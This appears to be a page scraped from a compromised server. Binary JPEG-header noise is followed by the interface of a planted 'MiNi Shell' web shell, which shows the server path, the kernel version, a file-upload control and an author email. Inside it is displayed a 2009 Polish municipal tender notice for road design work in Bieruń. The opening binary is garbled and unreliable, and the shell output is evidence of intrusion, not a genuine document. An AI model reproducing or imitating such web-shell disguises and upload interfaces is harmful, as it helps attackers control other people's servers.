JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20090928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20090928/164745-N-2009.html

<p class="kh_header"><b>Bieruń: Budowa połączenia ulicy Ks. P. Macierzyńskiego z ulicą Chemików w Bieruniu Starym - dokumentacja projektowa</b><br>
<b>Numer ogłoszenia: 164745 - 2009; data zamieszczenia: 28.09.2009</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Bieruń reprezentowana przez Burmistrza Miasta Bieruń , Rynek 14, 43-150 Bieruń, woj. śląskie, tel. 032 3242439, faks (032) 2164035; 2164777.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bierun.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Budowa połączenia ulicy Ks. P. Macierzyńskiego z ulicą Chemików w Bieruniu Starym - dokumentacja projektowa.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Przedmiotem  zamówienia jest wykonanie kompleksowej dokumentacji  projektowo -       kosztorysowej budowy połączenia ul. Ks.P.Macierzyńskiego z ul. Chemików w Bieruniu Starym, przygotowanej zgodnie z ustawą z dnia 10 kwietnia 2003 r. o szczególnych zasadach przygotowania i realizacji inwestycji w zakresie dróg publicznych (Dz. U. z 2003 r. Nr 80, poz. 721 z późniejszymi zmianami).

Projekt będzie obejmował zakresem budowę nowego odcinka drogi z dowiązaniem do istniejącego zagospodarowania terenu wraz z wykonaniem odwodnienia i budową oświetlenia ulicznego.
Zaleca się dokonanie wizji lokalnej w terenie przed złożeniem oferty.

Wytyczne opracowania projektu:
1.	Droga jednojezdniowa dwupasowa dł. ok. 100,0 m i szer. 5,0 m o nawierzchni z betonu asfaltowego (kat. ruchu KR2), z poboczem szer. 0,75 m.
2.	Chodnik jednostronny szer. 2,0 m o nawierzchni z kostki betonowej.
3.	Zatoka postojowa na 3-4 samochody.
4.	Włączenie drogi gminnej do drogi powiatowej poprzez przejście nad Potokiem Stawowym (wykonanie mostu bądź przepustu).

W ramach przedmiotu zamówienia należy opracować koncepcję układu drogowego połączenia                    ul. Macierzyńskiego z ul. Chemików, w oparciu o: 
1.	Mapę do celów projektowych, która powinna posiadać aktualną klauzulę właściwego ośrodka geodezyjnego z naniesionymi granicami i numerami działek oraz reperami państwowymi w obrębie inwestycji oraz spełniać wymagania określone w ustawie z dnia 17 maja 1989 r. Prawo geodezyjne i kartograficzne (tekst jedn. Dz. U. z 2005 r. Nr 240, poz. 2027 z późniejszymi zmianami).
2.	Projekt prac geologicznych i dokumentację geologiczno - inżynierską.
3.	Projekt prac hydrogeologicznych i dokumentację hydrogeologiczną.
4.	Inwentaryzację zieleni.	
5.	Uzgodnienia włączenia drogi gminnej do drogi powiatowej poprzez przejście nad Potokiem Stawowym.

Koncepcja powinna zawierać m. in. propozycje linii rozgraniczających pas drogowy i podziału działek oraz propozycje przebiegu ulicy, rozmieszczenia chodników, zatok postojowych, zjazdów, odwodnienia oraz oświetlenia ulicznego.
W ramach koncepcji należy opracować:
-	opis techniczny (zawierający m.in. analizę powiązania drogi z innymi drogami publicznymi, określenie zmian w dotychczasowej infrastrukturze zagospodarowania terenu);
-	niezbędne obliczenia;
-   część rysunkową, tj.:    - plan sytuacyjny - projekt zagospodarowania z naniesieniem
	  granic pasa drogowego (1:500),
	- profile podłużne (1:500-50),
	- przekroje charakterystyczne (1:50),
	- organizację ruchu (1:500),
	- dokumentację fotograficzną z terenu objętego inwestycją.

Wykonawca przedłoży Zamawiającemu koncepcję do zaopiniowania. Pozytywnie zaopiniowana koncepcja przez Zamawiającego będzie stanowić podstawę do wykonania projektu budowlano- wykonawczego.
Koncepcję należy opracować w 3 egz. oraz załączyć wersję elektroniczną - 1 szt.

Zgodnie z zatwierdzonym projektem koncepcyjnym należy wykonać następujące opracowania:

1.	Dokumentację geodezyjno - prawną:
- opracowanie projektów podziału działek pod projektowaną drogę, zestawienie działek (z wypisami 
  i wyrysami z ewidencji gruntów) wraz z zestawieniem powierzchni działek zajętych pod inwestycję   
  i podaniem szacunkowych kosztów nabycia nieruchomości;
- wytyczenie linii rozgraniczających drogę i okazanie granic w terenie.

      Opracowana dokumentacja powinna być kompletna, co oznacza, że powinna zawierać                    
      wszystkie materiały geodezyjne, prawne, potwierdzone wnioski (o wydanie decyzji, dokumentów lub 
      wykonywania jakichkolwiek zmian) oraz decyzje administracyjne. 
      Dokumentacja musi spełniać wszystkie wymogi konieczne do uzyskania decyzji zezwalającej na 
      realizację inwestycji drogowej.

2.	Projekt budowlano-wykonawczy, który powinien zawierać w szczególności:
a) opis techniczny;
b) niezbędne obliczenia;
c) dokładny opis stosowanych materiałów i urządzeń;
d) opracowanie informacji dotyczącej bezpieczeństwa i ochrony zdrowia (BIOZ);
e) część rysunkową, tj.:	
    - projekt zagospodarowania z naniesieniem  granic pasa drogowego (1:500),
           - plan sytuacyjny - plansza wymiarowa (1:500),
           - przekroje charakterystyczne (1:50),
      - profile podłużne (1:500/50),
      - przekroje poprzeczne (1:100),
      - organizacja ruchu (1:500),
      - inne rysunki elementów konstrukcji obiektów, instalacji  oraz urządzeń - skala wg potrzeb.
   W szczególności należy opracować projekty w następujących branżach:
-	projekt zagospodarowania terenu;
-	projekt drogowy;
-	projekt odwodnienia terenu;
-	projekt oświetlenia ulicznego;
-	projekty niezbędnej przebudowy wszystkich sieci infrastruktury technicznej związanej                             z funkcjonowaniem drogi (rozwiązanie wszelkich kolizji z istniejącym i projektowanym uzbrojeniem oraz uwzględnienie konieczności przełożenia, zabezpieczenia lub wymiany istniejącego uzbrojenia);
-	projekty przebudowy kolidujących obiektów budowlanych (np. ogrodzenia);
-	uzgodniony i zatwierdzony projekt docelowej organizacji ruchu;
-	uzgodniony i zatwierdzony projekt organizacji ruchu na czas prowadzenia robót;
-	inne projekty branżowe niezbędne do uzyskania decyzji zezwalającej na realizację inwestycji drogowej (m. in. projekt budowy przepustu drogowego bądź mostu   nad Potokiem Stawowym).

3.	Specyfikację techniczną wykonania i odbioru robót dla wszystkich branż.
4.	Przedmiary robót.
5.	Kosztorysy inwestorskie i zbiorcze zestawienia kosztów.
6.	Inwentaryzacja zieleni - zgodnie z obowiązującymi przepisami oraz w razie konieczności uzyskanie zgody na wycinkę i zbliżenie sieci do drzew i krzewów.
7.	Operat wodno-prawny wraz z uzyskaniem pozwolenia wodno-prawnego.

8.	Uzyskanie wszelkich koniecznych opinii, zgód, zatwierdzeń, uzgodnień dla wykonanego projektu (przygotowanie wniosków o wydanie przez dysponentów sieci warunków technicznych, uzyskanie opinii niezbędnych do wydania decyzji zezwoleniu na realizację inwestycji drogowej, uzgodnienie            z Zarządem Melioracji i Urządzeń Wodnych - włączenie do ul. Chemików, uzgodnienia branżowe - Zakład Energetyczny, Gazowniczy, RPWiK Tychy, i inne, uzgodnienie organizacji ruchu itp.).
9.	Uzyskanie pozwolenia Śląskiego Wojewódzkiego Konserwatora Zabytków na wykonywanie robót budowlanych w strefie -B- ochrony konserwatorskiej.
10.	Uzyskanie decyzji o środowiskowych uwarunkowaniach określonej w przepisach ustawy                          z dnia 03.10.2008 r. o udostępnianiu informacji o środowisku i jego ochronie, udziale społeczeństwa w ochronie środowiska oraz o ocenach oddziaływania na środowisko                          (Dz. U. z  2008 r. nr 199 poz. 1227) i sporządzenie raportu oddziaływania na środowisko wraz ze stosownymi postanowieniami i uzgodnieniami oraz dokumentacją techniczną zabezpieczeń wynikających z raportu oddziaływania na środowisko (jeśli zajdzie konieczność). 
11.	Wykonanie i skompletowanie załączników do wniosku o wydanie decyzji o zezwoleniu 
na realizację inwestycji drogowej, przygotowanie wniosku w imieniu Zamawiającego                           do uzyskania zezwolenia na realizację inwestycji drogowej w oparciu o przepisy ustawy z dnia 10 kwietnia 2003 r. (Dz. U. Nr 80 poz. 721 z późn. zm.) o szczególnych zasadach przygotowania          i realizacji inwestycji w zakresie dróg  publicznych tzw. specustawy.
Uwaga.
1)	Dokumentację należy wykonać w wersji papierowej i elektronicznej. 
Koncepcję w wersji papierowej należy wykonać w 3 egz.
Wersję papierową dokumentacji należy wykonać w 7 egzemplarzach, za wyjątkiem kosztorysu inwestorskiego, który należy wykonać w 2  egz.
Wersję elektroniczną należy wykonać w 2 kpl., z tym, że kosztorys inwestorski należy 
      dostarczyć na oddzielnym nośniku.
2)   Przyjęte w trakcie projektowania rozwiązania, materiały oraz odstępstwa od koncepcji należy 
      konsultować z Zamawiającym oraz uzyskać  jego akceptację.
3)   Projektant zobowiązany jest do opisywania proponowanych materiałów i urządzeń za pomocą 
      parametrów technicznych, tzn. bez podawania ich nazw, znaków wskazujących na producenta.
4)   Zaleca się dokonanie wizji lokalnej terenu przeznaczonego pod zabudowę przed złożeniem   
      oferty.
5)   Zamawiający nie przewiduje: aukcji elektronicznej , zawarcia umowy ramowej w rozumieniu ustawy 
      Pzp.
6) Zamawiający przewiduje udzielenie zamówień uzupełniających zgodnie z art.67 ust.6 ustawy Prawo 
    zamówień publicznych do 50% wartości zamówienia podstawowego, w przypadku konieczności 
    uzupełnienia projektu. 

Z uwagi na ograniczoą ilość miejsca w formularzu ogłoszenia , uzupełnienie  przedmiotu zamówienia w SIWZ..</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 71.00.00.00-8, 71.24.20.00-6, 71.24.50.00-7, 71.32.00.00-7.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> tak.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 15.12.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Wadium w wysokości 2 000 zł ( słownie: dwatysiącezłotych) musi być wniesione w terminie, który został podany w punkcie  Terminy. 
Wadium wnoszone w pieniądzu należy przelać na rachunek Zamawiającego 
w BS oddz.Tychy numer konta: 26 84350004 0000 0000 6158 0001 z adnotacją: 
Wadium - nr sprawy: ZP- 3410 - 41     -09 Przetarg nieograniczony na wybór wykonawcy 
   dokumentacji projektowej budowy połączenia ul. Ks.Macierzyńskiego z ul. Chemików w Bieruniu    
   Starym.
 Wniesienie wadium w pieniądzu- oznacza uznanie kwoty wadium na rachunku Zamawiającego.
Wadium wnoszone w innej formie niż pieniądz należy złożyć w kasie Urzędu Miejskiego 
w Bieruniu, nie później niż do godz. 12.00  w dniu otwarcia ofert. 
Wadium może być wniesione w następujących formach:
1)	w pieniądzu przelewem,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo-kredytowej, 
       z tym że poręczenie kasy jest zawsze poręczeniem pieniężnym,
3)	w gwarancjach bankowych,
4)    w gwarancjach ubezpieczeniowych, 
5)	w poręczeniach udzielanych przez podmioty, o których mowa w art.6 b ust.5 pkt 2 ustawy 
       z dnia 9.11.2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz.U. Nr 109 
       poz.1158 z późniejszymi zmianami).
W przypadku wniesienia wadium przez Wykonawców wspólnie ubiegających się o udzielenie nin. zamówienia, należy wskazać  wszystkich wykonawców wspólnie ubiegających się                          o udzielenie zamówienia wraz z podaniem ich nazw i siedzib.                                                              Wykonawca, który nie wniesie wadium, zostanie wykluczony z postępowania, zgodnie                           z art.24ust.2 pkt 4 ustawy, a jego oferta zostanie odrzucona.

2.  Zasady zwrotu wadium
Wadium wniesione w pieniądzu Zamawiający zwróci, zgodnie z art. 46 ust. 4 ustawy wraz 
z odsetkami wynikającymi z umowy rachunku bankowego, na którym było ono przechowywane, 
pomniejszonym o koszty prowadzenia rachunku oraz prowizji bankowej za przelew pieniędzy 
na rachunek wykonawcy.

1) Zgodnie z art. 46 ust.1 ustawy, wadium zostanie zwrócone niezwłocznie, jeżeli:
a) upłynął termin związania ofertą,
b) zawarto umowę i wniesiono zabezpieczenie należytego wykonania tej umowy,
c) Zamawiający unieważnił postępowanie, a protesty zostały ostatecznie rozstrzygnięte 
lub upłynął termin do ich wnoszenia.
2) Z zastrzeżeniem ust.4a ustawy, Zamawiający zwraca niezwłocznie wadium na wniosek Wykonawcy:
     a) który wycofał ofertę przed upływem terminu składania ofert;
     b) który został wykluczony  z postępowania;
     c) którego oferta została odrzucona.

3. Utrata wadium
Zgodnie z zastrzeżeniem ust.4a Zamawiający zatrzymuje wadium wraz z odsetkami, jeżeli Wykonawca w odpowiedzi na wezwanie, o którym mowa w art.26 ust.3, nie złożył dokumentów lub oświadczeń, 
o których mowa w art.25 ust.1, lub pełnomocnictw, chyba że udowodni, że wynika to z przyczyn nie leżących po jego stronie.
Zgodnie z art. 46 ust. 5 ustawy Zmawiający zatrzymuje wadium wraz z odsetkami, jeżeli 
Wykonawca, którego oferta została wybrana:
1) odmówił podpisania umowy w sprawie zamówienia publicznego na warunkach określonych 
    w ofercie;
2) nie wniósł zabezpieczenia należytego wykonania umowy; 
3) zawarcie umowy w sprawie zamówienia publicznego stało się niemożliwe z przyczyn 
    leżących po stronie Wykonawcy.<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> W ubieganiu się o udzielenie zamówień mogą uczestniczyć Wykonawcy, którzy:
1)   spełniają wszystkie wymagania wynikające z oświadczeń, których listę przedstawiono 
      w  punkcie Wymagane oświadczenia oraz inne wymagania formalne określone SIWZ                        
      i ustawą;
2)   posiadają wiedzę i doświadczenie, tj. w okresie ostatnich trzech lat przed dniem wszczęcia 
      postępowania, a jeśli okres prowadzenia działalności jest krótszy - to w tym okresie, wykonali
      z należytą starannością co najmniej 2 projekty budowlano-wykonawcze modernizacji lub budowy 
      dróg z odwodnieniem oraz co najmniej 1 projekt budowy lub modernizacji oświetlenia ulicznego.
      Zamawiający uzna wykonanie projektu budowy lub modernizacji oświetlenia ulicznego w ramach 
      wykonanych dokumentacji drogowych.
3)   Dysponują lub będą dysponować w okresie przewidzianym na realizację zamówienia osobami 
      zdolnymi do wykonania zamówienia, posiadającymi kwalifikacje zawodowe, a w szczególności 
      osobami posiadającymi uprawnienia w rozumieniu ustawy Prawo Budowlane z dnia   
      07.07.1994 r. (tekst jednolity: Dz.U. z 2006 r., nr 156, poz.1118 z późn. zmianami) oraz ustawy   
      z dnia 15.12.2000 r. o samorządach zawodowych architektów, inżynierów budownictwa oraz  
      urbanistów (Dz.U. z 2001 r., nr 5, poz. 42 z późn. zmianami) do projektowania bez ograniczeń 
      w specjalnościach:
      a)   instalacyjnej w zakresie sieci  kanalizacyjnych,
      b)   instalacji i urządzeń elektrycznych i elektroenergetycznych,
      c)   drogowej,
      posiadającymi aktualne zaświadczenie o przynależności do właściwej Izby Samorządu   
      Zawodowego, ważne na dzień składania ofert.

Ocena spełnienia warunków uczestnictwa w postępowaniu będzie dokonana wg zasady spełnia-nie spełnia, na podstawie przedłożonych w ofercie dokumentów i oświadczeń w związku 
z wymaganiami określonymi  w SIWZ..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> Każdy wykonawca przystępujący do postępowania złoży następujące oświadczenia:
1.  Oświadczenia z art. 22 ust.1 oraz z art.24 ust. 1 i ust.2 pkt.1 ustawy, że:
1)	posiada uprawnienia do wykonywania określonej działalności lub czynności, jeżeli 
       ustawy nakładają obowiązek posiadania takich uprawnień,
         2)    posiada niezbędną wiedzę i doświadczenie oraz dysponuje potencjałem technicznym                        
                i osobami zdolnymi do wykonania zamówienia,/lub przedstawią pisemne zobowiązanie innych 
                podmiotów do udostępnienia potencjału technicznego i osób zdolnych do wykonania 
                zamówienia
         3)   znajduje się w sytuacji ekonomicznej i finansowej zapewniającej wykonanie zamówienia,
         4)   nie podlega wykluczeniu z postępowania na podstawie art. 24 ust.1 i ust.2 pkt1 ustawy.
2.  Oświadczenie, że  po zapoznaniu się z SIWZ  akceptuje ją bez zastrzeżeń.
3.  Oświadczenie, że będzie związany ofertą przez 30 dni od daty upływu terminu składania ofert, 
     a w przypadku wygrania przetargu zawrze umowę wg wzoru dołączonego do specyfikacji                      
     w  ciągu 14 dni od daty otrzymania zawiadomienia o wyborze oferty.
4. Oferta jest jawna w całości-części. Strony oferty od - do stanowią tajemnicę 
     przedsiębiorstwa w rozumieniu przepisu o zwalczaniu nieuczciwej  konkurencji i nie mogą być 
     ujawnione innym uczestnikom postępowania  .
5.  Oświadczenie podmiotów występujących wspólnie ( w przypadku ich uczestnictwa).
6.  Oświadczenie o wykonaniu zamówienia siłami własnymi lub o powierzeniu wykonania części 
     zamówienia podwykonawcom.
  Wzory oświadczeń  są dołączone do SIWZ.

Wszystkie oświadczenia muszą być złożone w oryginale i podpisane przez osobę (osoby) uprawnione do zaciągania zobowiązań w imieniu wykonawcy zgodnie z załączonym do oferty aktualnym wpisem do właściwych rejestrów (KRS) czy ewidencji działalności gospodarczej lub odpowiednimi pełnomocnictwami, złożonymi w formie oryginałów lub notarialnie poświadczonych kopii.
    Od Wykonawców ubiegających się o przyznanie zamówienia wymagane jest, w celu 
potwierdzenia spełnienia warunków, o których mowa w art. 22 ust. 1 ustawy, przedstawienie 
wymienionych niżej dokumentów. Dokumenty te, zgodnie z obowiązującym w tym zakresie 
Rozporządzeniem  Prezesa Rady Ministrów z dnia 19 maja 2006r. (Dz. U. nr 87 z 2006, poz. 605 z późn. zm. ), mogą być przedstawione w formie oryginału albo kserokopii poświadczonej za zgodność z oryginałem przez  Wykonawcę  tzn. osobę (osoby) uprawnioną(e) do podpisania oferty:
1.   Aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji 
 działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia 
 do ewidencji działalności gospodarczej, wystawiony nie wcześniej niż 6 miesięcy przed 
 upływem terminu składania ofert.
2. Wykaz wykonanych  z należytą starannością w okresie trzech lat przed dniem wszczęcia 
    postępowania, a jeżeli okres prowadzenia działalności jest krótszy - to w tym okresie     
    co najmniej co najmniej 2 projektów budowlano-wykonawczych modernizacji lub budowy dróg                     
    z odwodnieniem  oraz co  najmniej 1 projektu budowy lub modernizacji oświetlenia ulicznego dla 
    potwierdzenia spełnienia  warunku z  pktu VI.2.  Wykaz należy sporządzić wg wzoru tabeli stanowiącej 
    załącznik do SIWZ.
3. Dokumenty (np. referencje) potwierdzające należytą staranność wykonania oraz zakres projektów 
     wymienionych  w wykazie, wymaganych do spełnienia warunku z punktu VI.2 SIWZ.   
4.   Wykaz osób, którymi dysponuje lub będzie dysponował Wykonawca  i które będą uczestniczyć         
      w wykonywaniu zamówienia, wraz z informacjami na temat ich kwalifikacji niezbędnych do 
      wykonania zamówienia ( wg załącznika do SIWZ), 
5.   Dokumenty potwierdzające posiadanie uprawnień przez osoby wymienione w wykazie osób, 
      o którym mowa powyżej - dla których są one wymagane (wskazanych w punkcie VI.3 SIWZ).
6.   Zaświadczenia o  przynależności do Izby Samorządu Zawodowego, ważne na dzień składania   
      ofert, dla osób wymienionych w wykazie osób, o którym mowa powyżej - dla których są one   
      wymagane.       
    Uwaga:
Jeżeli  Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w punkcie 1 Listy wymaganych dokumentów przedstawia odpowiednio:
1.  pkt. 1 - dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce     zamieszkania, potwierdzające odpowiednio, że:
a)	nie otwarto jego likwidacji ani nie ogłoszono upadłości.
Dokument, o którym mowa powyżej, powinien być wystawiony nie wcześniej niż 6 miesięcy przed upływem, przed upływem terminu składania ofert.
Jeżeli w kraju pochodzenia osoby lub w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się dokumentu, o którym mowa powyżej (w dziale VIII.1), zastępuje się go dokumentem zawierającym oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio kraju pochodzenia osoby lub kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania.
Termin ważności oświadczeń jest taki sam, jak dotyczący dokumentu, o którym mowa w punkcie                   1 niniejszej uwagi..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bierun.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Miejski 43-150 Bieruń ul. Rynek 14 ( Referat Zamówień Publicznych).</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 12.10.2009 godzina 12:00, miejsce: Urząd Miejski 43-150 Bieruń ul. Rynek 14 ( kancelaria - parter).</p><p><b>IV.3.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com